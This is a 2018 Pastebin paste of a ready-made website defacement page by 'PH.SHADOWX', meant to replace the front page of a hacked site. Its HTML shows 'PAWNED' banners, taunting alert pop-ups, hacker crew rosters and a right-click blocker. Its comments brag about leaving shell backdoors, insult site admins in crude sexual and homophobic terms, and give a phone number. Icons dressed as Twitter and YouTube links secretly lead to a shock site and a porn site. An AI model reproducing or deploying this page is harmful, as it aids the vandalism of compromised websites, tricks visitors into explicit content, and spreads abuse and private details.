Advertisement
Guest User

Deface Page By PH.SHADOWX

a guest
Aug 22nd, 2018
1,261
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 13.54 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4.  
  5. <!--Coding : UTF-8-->
  6.  
  7.   <!--SCRIPT CODED BY PH.SHADOWX | ©2018-->
  8.  
  9.   <!--Special Mentions : | PureHackers International | Elite Cyber Security | Blood Security Hackers | AnonGhost Philippines | Cyber Security International | Pinoy Lulzsec | AnonGhostSec | -->
  10.  
  11.  
  12.  
  13.  <!-- Ge Free To Copy My Code Madirpakirs :v-->
  14.  
  15.  
  16.  <!--=================================NOTE FOR ADMINS AND LEECHERS===============================-->
  17.  
  18.  
  19.  <!--BIO : AKO NGA PALA SI PH.SHADOWX ANG PINAKA POGI SA PUREHAX
  20. ELITE CYBER SECURITY AT FILTECH HACKERS PERO D HAXXUR HIHE :<..........GUSTO MO
  21. EUTIN KTA? TAWAGAN MO NLNG PHONE NO. KO : 09192697329
  22. TANGINA TAWAGIN NYO NA AKO NATITIGANGZXC NAKO GUSTO KO BABAE
  23. NA BERGIN D YUNG INEUT NA NG GIN AT KUTSILYO AT TSAKA BAKLA PUTANGINA :V.......
  24. HMMM YUN LNG SALAMAT SA PAKIKINIG KBYE. ~PH.SHADOWX-->
  25.  
  26.  
  27.  
  28.  <!--GUSTO MO PA GREET? TANGINA MO DAMI NANG CN SA
  29. GREETINGS LIST KO YUNG IBA HAXXUR MALIBAN SAKEN HIHE :<
  30. PERO KUNG GUSTO MO PAG PA GREET GE KANTOTIN LNG KTA MAADD NA
  31. KTA SA GREETZXC :D PAYAG? GEYM! HIHE-->
  32.  
  33.  
  34.  
  35.  <!--For Admin : PUTANGINA NYO AYUSIN NYO NMAN SECURITY NYO PASALAMAT
  36. KAYO NA MAY FREE PENETRATION TEST OH YAN NAKALIBRE NA KAYO POTANGINA NYO!
  37. KAYA NMAN WAG NMAN SANA NA IDEDELETE NYO LNG DEFACE PAGE KO AT SHELL
  38. BACKDOOR KO NA D INAAYOS ANG VULNERABILITY NG SITE NYO QAQO PRA MAMIMIRROR SA ZONE-H
  39. AT D MASABIHAN NA LASPAG!!!! DI JONKZXC HIHE HAHAHHAHAHAAHAH PUTANGINA NYO PRIN KBYE :v-->
  40.  
  41.  
  42.  
  43.  <!--CopyRight PH.SHADOWX © 2018 PureHackers International / Elite Cyber Security-->
  44.  
  45.  
  46.  <!--=================================END OF NOTE(WLANG FOREVER GAGO :v)====================================-->
  47.  
  48.   <!-- Based on http://codepen.io/lbebber/pen/ypgql -->
  49.  
  50.  
  51.  
  52.   <!--OH MGA LEECHERZXC LALO NA SI KAITO BURATBU ITO NA PINAKAKAINTAY NYONG GAGONG SOURCE CODE PUTANGINA NYO :v-->
  53.  
  54.   <link href="http://necolas.github.io/normalize.css/3.0.2/normalize.css" rel='stylesheet'/>
  55.   <script src="https://cdnjs.cloudflare.com/ajax/libs/prefixfree/1.0.7/prefixfree.min.js"></script>
  56.   <style>
  57.     /* Just colors and font sizes */
  58.    * {
  59.    margin:0;
  60.    padding:0;
  61.    }
  62.    body {
  63.    background-color: #000000;
  64.    font-family:  'Orbitron';
  65.    }
  66.    
  67.     .glitch {
  68.       color: white;
  69.       font-size: 100px;
  70.       margin: 0 auto;
  71.       width: 400px;
  72.     }
  73.    
  74.     /* Real glitch effect */
  75.     .glitch {
  76.       position: relative;
  77.     }
  78.    
  79.     .glitch:after {
  80.       animation: glitch-animation 2s infinite linear alternate-reverse;
  81.       background: black;
  82.       clip: rect( 0, 900px, 0, 0 );
  83.       color: white;
  84.       content: attr( data-text );
  85.       left: 2px;
  86.       overflow: hidden;
  87.       position: absolute;
  88.       text-shadow: -1px 0 red;
  89.       top: 0;
  90.     }
  91.     .glitch:before {
  92.       animation: glitch-animation-2 3s infinite linear alternate-reverse;
  93.       background: black;
  94.       clip: rect( 0, 900px, 0, 0 );
  95.       color: white;
  96.       content: attr( data-text );
  97.       left: -2px;
  98.       overflow: hidden;
  99.       position: absolute;
  100.       text-shadow: 1px 0 blue;
  101.       top: 0;
  102.     }
  103.     /* Expanded Animations */
  104.     @keyframes glitch-animation {
  105.       0% {
  106.         clip: rect(42px, 9999px, 44px, 0);
  107.       }
  108.       5% {
  109.         clip: rect(12px, 9999px, 59px, 0);
  110.       }
  111.       10% {
  112.         clip: rect(48px, 9999px, 29px, 0);
  113.       }
  114.       15.0% {
  115.         clip: rect(42px, 9999px, 73px, 0);
  116.       }
  117.       20% {
  118.         clip: rect(63px, 9999px, 27px, 0);
  119.       }
  120.       25% {
  121.         clip: rect(34px, 9999px, 55px, 0);
  122.       }
  123.       30.0% {
  124.         clip: rect(86px, 9999px, 73px, 0);
  125.       }
  126.       35% {
  127.         clip: rect(20px, 9999px, 20px, 0);
  128.       }
  129.       40% {
  130.         clip: rect(26px, 9999px, 60px, 0);
  131.       }
  132.       45% {
  133.         clip: rect(25px, 9999px, 66px, 0);
  134.       }
  135.       50% {
  136.         clip: rect(57px, 9999px, 98px, 0);
  137.       }
  138.       55.0% {
  139.         clip: rect(5px, 9999px, 46px, 0);
  140.       }
  141.       60.0% {
  142.         clip: rect(82px, 9999px, 31px, 0);
  143.       }
  144.       65% {
  145.         clip: rect(54px, 9999px, 27px, 0);
  146.       }
  147.       70% {
  148.         clip: rect(28px, 9999px, 99px, 0);
  149.       }
  150.       75% {
  151.         clip: rect(45px, 9999px, 69px, 0);
  152.       }
  153.       80% {
  154.         clip: rect(23px, 9999px, 85px, 0);
  155.       }
  156.       85.0% {
  157.         clip: rect(54px, 9999px, 84px, 0);
  158.       }
  159.       90% {
  160.         clip: rect(45px, 9999px, 47px, 0);
  161.       }
  162.       95% {
  163.         clip: rect(37px, 9999px, 20px, 0);
  164.       }
  165.       100% {
  166.         clip: rect(4px, 9999px, 91px, 0);
  167.       }
  168.     }
  169.     @keyframes glitch-animation-2 {
  170.       0% {
  171.         clip: rect(65px, 9999px, 100px, 0);
  172.       }
  173.       5% {
  174.         clip: rect(52px, 9999px, 74px, 0);
  175.       }
  176.       10% {
  177.         clip: rect(79px, 9999px, 85px, 0);
  178.       }
  179.       15.0% {
  180.         clip: rect(75px, 9999px, 5px, 0);
  181.       }
  182.       20% {
  183.         clip: rect(67px, 9999px, 61px, 0);
  184.       }
  185.       25% {
  186.         clip: rect(14px, 9999px, 79px, 0);
  187.       }
  188.       30.0% {
  189.         clip: rect(1px, 9999px, 66px, 0);
  190.       }
  191.       35% {
  192.         clip: rect(86px, 9999px, 30px, 0);
  193.       }
  194.       40% {
  195.         clip: rect(23px, 9999px, 98px, 0);
  196.       }
  197.       45% {
  198.         clip: rect(85px, 9999px, 72px, 0);
  199.       }
  200.       50% {
  201.         clip: rect(71px, 9999px, 75px, 0);
  202.       }
  203.       55.0% {
  204.         clip: rect(2px, 9999px, 48px, 0);
  205.       }
  206.       60.0% {
  207.         clip: rect(30px, 9999px, 16px, 0);
  208.       }
  209.       65% {
  210.         clip: rect(59px, 9999px, 50px, 0);
  211.       }
  212.       70% {
  213.         clip: rect(41px, 9999px, 62px, 0);
  214.       }
  215.       75% {
  216.         clip: rect(2px, 9999px, 82px, 0);
  217.       }
  218.       80% {
  219.         clip: rect(47px, 9999px, 73px, 0);
  220.       }
  221.       85.0% {
  222.         clip: rect(3px, 9999px, 27px, 0);
  223.       }
  224.       90% {
  225.         clip: rect(26px, 9999px, 55px, 0);
  226.       }
  227.       95% {
  228.         clip: rect(42px, 9999px, 97px, 0);
  229.       }
  230.       100% {
  231.         clip: rect(38px, 9999px, 49px, 0);
  232.       }
  233.       }
  234.       .sticky-container{
  235.       padding:0px;
  236.       margin:0px;
  237.       position:fixed;
  238.       right:-130px;
  239.       top:300px;
  240.       width:167px;
  241.       z-index: 1100;
  242.       }
  243.       .sticky li{
  244.       list-style-type:none;
  245.       background-color:transparent;
  246.       color:#efefef;
  247.       height:43px;
  248.       padding:0px;
  249.       margin:0px 0px 1px 0px;
  250.       -webkit-transition:all 0.25s ease-in-out;
  251.       -moz-transition:all 0.25s ease-in-out;
  252.       -o-transition:all 0.25s ease-in-out;
  253.       transition:all 0.25s ease-in-out;
  254.       cursor:pointer;
  255.       }
  256.       .sticky li:hover{
  257.       margin-left:-11px;
  258.       }
  259.       .sticky li img{
  260.       float:left;
  261.       margin:5px 4px;
  262.       margin-right:5px;
  263.       }
  264.       .sticky li p{
  265.       padding-top:5px;
  266.       margin:0px;
  267.       line-height:16px;
  268.       font-size:11px;
  269.       }
  270.       .sticky li p a{
  271.       text-decoration:none;
  272.       color:#2C3539;
  273.       }
  274.       .sticky li p a:hover{
  275.       text-decoration:underline;
  276.       }
  277.   </style>
  278.   <!--HABA NG STYLING PRA LNG MA GLITCH ANG IISANG TEXT POTA :'v-->
  279.   <title>PH.SHADOWX WAS HERE</title>
  280.   <link href='http://i68.tinypic.com/65si9x.jpg' rel='icon' type='image/x-icon'/>
  281.   <meta name='author' content='Ph.ShadowX'>
  282.   <meta charset="UTF-8">
  283.   <meta property="og:description" content="IS THIS YOU CALLED SECURITY?" />
  284.   <meta property="og:keywords" content="Seized, Stamped, Pawned By PH.SHADOWX" />
  285.   <meta property="og:image" content="http://i64.tinypic.com/23ud8rc.jpg"/>
  286.   <link href='http://i68.tinypic.com/65si9x.jpg' rel='SHORTCUT ICON'/>
  287.   <link rel="stylesheet" href="http://karyamurid.com/jangandihapus/videoYoutubeBackground/css/normalize.css" media="all">
  288.   <script src="http://karyamurid.com/jangandihapus/videoYoutubeBackground/js/jquery-1.11.1.min.js"></script>
  289.   <script src="http://karyamurid.com/jangandihapus/videoYoutubeBackground/js/device.min.js"></script>
  290.   <script src="http://karyamurid.com/jangandihapus/videoYoutubeBackground/js/jquery.mb.YTPlayer.js"></script>
  291.   <script src="http://karyamurid.com/jangandihapus/videoYoutubeBackground/js/custom.js"></script>
  292. </head>
  293. <body>
  294.   <script>alert("Got Pawned? :D");</script>
  295.   <script>alert("Your Security Sucks");</script>
  296.   <div class="glitch" data-text="PAWNED">PAWNED</div>
  297.     <a id="bgndVideo" class="player" data-property="{videoURL:'https://www.youtube.com/watch?v=cfhtLRA_Gv8',containment:'body',autoPlay:true, startAt:0, opacity:1}"></a>
  298.   <center><h1><font color="white" /> #P</font><font color="8b0000" />H.</font><font color="white" />S</font><font color="8b0000" />H</font><font color="white" />A</font><font color="8b0000" />D</font><font color="white" />O</font><font color="8b0000" />W</font><font color="white" />X</font> <font color="white" /> WAS HERE</h1></center></font>
  299.   <center><h2><font color="white" /> SECURITY IS JUST AN </font> <font color="#8b0000" /> ILLUSION </h2></center></font>
  300.   <br>
  301.   <center><h1><font color="white" />  </font> <font color="#8b0000" />  #PUR3H4CK3RS</font><font color="white" />UNL34SH3D / ELITE CYBER SECURITY / PINOY ANTISEC </font></h1></center>
  302.   <br>
  303. </body>
  304. <body>
  305.   <!-- Social -->
  306.   <div class="sticky-container">
  307.       <ul class="sticky">
  308.           <li>          
  309.               <a href="https://www.facebook.com/PureHackers.Sec/" target="_blank"><img src="https://png.icons8.com/color/2x/facebook.png" width="32" height="32">
  310.   </a>
  311.           </li>
  312.           <li>
  313.               <a href="https://meatspin.com" target="_blank"><img src="https://png.icons8.com/color/2x/twitter-squared.png" width="32" height="32">
  314.              </a>
  315.           </li>
  316.           <li>
  317.               <a href="http://www.youjizz.com/" target="_blank"><img src="https://png.icons8.com/color/2x/youtube-play.png" width="32" height="32">
  318.              </a>
  319.           </li>
  320.       </ul>
  321.   </div>
  322.   <center><h3><font color="white" />It's Better To Have A Good</font><font color="#8b0000" /> Security </font><font color="white" /> No More, than fooling Everyone Including Yourselves And Have One</h3></center></font>
  323.  <br>
  324.   <center><h5><font color="white" /> #NONSENSE IT ONLY MAKES US </font> <font color="#8b0000" /> SLOWER </font></h5></center>
  325. <br>
  326.   <center><h4><font color="white" /> All Rights Reserved 2018 </font> <font color="#8b0000" /> SINCE 2014 </font></h4></center>
  327.   <br>
  328.   <center><h3><font color="white" />We Are:</font></h3></center>
  329.   <br>
  330.   <br>
  331.   <center><h3><font color="white" />Pure Team:</h3></center></font>
  332.   <br>
  333.   <center><h4><font color="white" />-= | PH.R3D | PH.SOL | KERJ.ATTACKER | Xscyth3 | D4rk_ur4n!um | PH.Winsxs | PH.K1LluA | PH.G0N | XSilver | Spade | sm1l3 | S4nj1  | BSHxS34N | PH.BL4CK | Mafiaboy | PH.XDM8 | PH.N | ph.s1L3ntgh0st | xPad3 | INTRAVENOUS.PH | Satan666 | Imba.PH | PH.3XTR4CT | PH.xR3aper | PH.1nDr4 | J4ck Skel3t0n | NewbieXHacker | Mng.Carl | ph.MasKARra | Mang Kepweng/DarKLorD.PH | <font color="8b0000" />PH.SHADOWX </font> <font color="white" />| Skywr4th | V1RUZ3L =-</h4></center></font>
  334.   <br>                                                                            <!--PureHackers International (Mga Badingzxc To :P)-->
  335.   <br>
  336.   <center><h3><font color="white" />ECS Team:</h3></center></font>
  337.   <br>
  338.   <center><h4><font color="white" />-= | Lulz.Father | <font color="8b0000" /> PH.SHADOWX </font> <font color="white" /> | ~Nel | xTian | m3m.v1ru5 | Shrio | ST4LK3R007 | =-</h4></center></font>
  339.   <br>                                                  <!--Elite Cyber Security-->
  340.   <center><h3><font color="white" />Greetz:</h4></center></font>
  341.   <br>
  342.   <center><h4><font color="white" />-= | Ph.h4rh4r | Mr.Light | X-m3n | TRIGG3R-X | W33B | tim3l00p | Skywalkerz | MasterJeo | Pinoy ClownSecurity | Blood Secutity International | D4rkJ1n | Sh4dowm4sk | Apekz | BlackBl33d | StrawHat Luffy | Gr3ySh4d0w | Kh4lif4x | DarkLord.PH | xMadara | xBayag | Dwayne Lifter | Gr4ndF4th3r | J4N3 | Uncle | Pinoy Lulzsec | AnonGhost Philippines | Keyboard User | XShadow | Ste4lth.ph | Nu8170 | Ph.N3cro | Tr0j4nX |=-
  343.   <br>                                                                         <!--POTAAAAAAAAAAAAAAAAAAAAAAAAAAA ANG DAMI NAG PAPAGREETZXCCCCCCCCCCCCCCCCCCCCCCCC :'v-->
  344.   <br>
  345. <center><p><font color="8b0000" /> | </font><a href="https://www.facebook.com/0x536861646f77582e7068746d6c" target="_blank"><font color="8b0000" </font>CONTACT ME</a> | <a href="https://www.facebook.com/PureHackers.Sec/" target="_blank" /><font color="8b0000" </font>Follow PureHackers</a> | <a href="https://www.facebook.com/elitecybersec/" target="_blank" /><font color="8b0000" </font>Follow Elite Cyber Security</a> | </p></center>  
  346.  
  347. <style type="text/css">* {cursor: url(http://ani.cursors-4u.net/cursors/cur-13/cur1165.ani), url(http://ani.cursors-4u.net/cursors/cur-13/cur1165.png), auto !important;}</style><a href="http://www.cursors-4u.com/cursor/2018/06/09/hell-yeah-pointer-8.html" target="_blank" title="Hell Yeah Pointer 8"><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Hell Yeah Pointer 8" style="position:absolute; top: 0px; right: 0px;" /></a>
  348.  
  349.   <script type="text/javascript />
  350.   $(document).ready(function () {
  351.        //Disable full page
  352.        $("body").on("contextmenu",function(e){
  353.            return false;
  354.        });
  355.  
  356.        //Disable part of page
  357.        $("#id").on("contextmenu",function(e){
  358.            return false;
  359.        });
  360.    });
  361.    </script>
  362.    
  363. <!--Special Greetz to : PH.SOL PH.R3D W33B DarkLord.PH XSilver XShadow M4st3rJ30 Gr3ySh4d0w Sp4d3 X-m3n Mr.Light And You :D -->
  364. <br>
  365.  
  366. <!-- Damn Nibba This Deface Page Is Masterpiece! :D ~Ph.ShadowX -->
  367.  
  368.  
  369. <!--FIX YOUR FUCKIN DUMB SECUIRTY ADMIN :v-->
  370.  
  371. <!-- ./logout -->
  372.  
  373. <!-- -={END}=- -->
  374.  
  375.  
  376. </body>
  377. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement